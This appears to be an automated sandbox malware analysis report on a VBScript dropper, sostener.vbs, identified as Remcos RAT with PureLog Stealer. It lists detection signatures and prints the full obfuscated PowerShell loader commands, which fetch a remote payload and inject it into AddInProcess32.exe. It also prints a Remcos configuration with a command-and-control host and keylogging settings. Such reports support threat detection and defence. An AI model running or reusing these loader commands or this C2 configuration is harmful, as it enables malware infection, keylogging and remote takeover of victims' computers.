Windows
Analysis Report
sostener.vbs
Overview
General Information
Detection
Remcos, PureLog Stealer
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch or control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 4780 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 2784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )" MD5: 04029E121A0CFA5991749937DD22A1D9)
- AddInProcess32.exe (PID: 3200 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
- AddInProcess32.exe (PID: 1836 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
- AddInProcess32.exe (PID: 4188 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity. | | | |
```json
{
  "Version": "4.9.4 Pro",
  "Host:Port:Password": "newssssssssssssss.duckdns.org:2404:0",
  "Assigned name": "Matrix Fenix*",
  "Connect interval": "1",
  "Install flag": "Disable",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Enable",
  "Install path": "Application path",
  "Copy file": "remcos.exe",
  "Startup value": "Disable",
  "Hide file": "Disable",
  "Mutex": "Rmc-XDNGQ0",
  "Keylog flag": "1",
  "Keylog path": "Application path",
  "Keylog file": "registros.dat",
  "Keylog crypt": "Disable",
  "Hide keylog file": "Disable",
  "Screenshot flag": "Disable",
  "Screenshot time": "10",
  "Take Screenshot option": "Disable",
  "Take screenshot title": "",
  "Take screenshot time": "5",
  "Screenshot path": "AppData",
  "Screenshot file": "Capturas de pantalla",
  "Screenshot crypt": "Disable",
  "Mouse option": "Disable",
  "Delete file": "Disable",
  "Audio record time": "5"
}
```
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | | |
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | | |
Windows_Trojan_Remcos_b296e965 | unknown | unknown | | |
REMCOS_RAT_variants | unknown | unknown | | |
INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen | | |

(5 of 17 entries shown)
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | | |
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | | |
Windows_Trojan_Remcos_b296e965 | unknown | unknown | | |
REMCOS_RAT_variants | unknown | unknown | | |
INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen | | |

(5 of 18 entries shown)
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |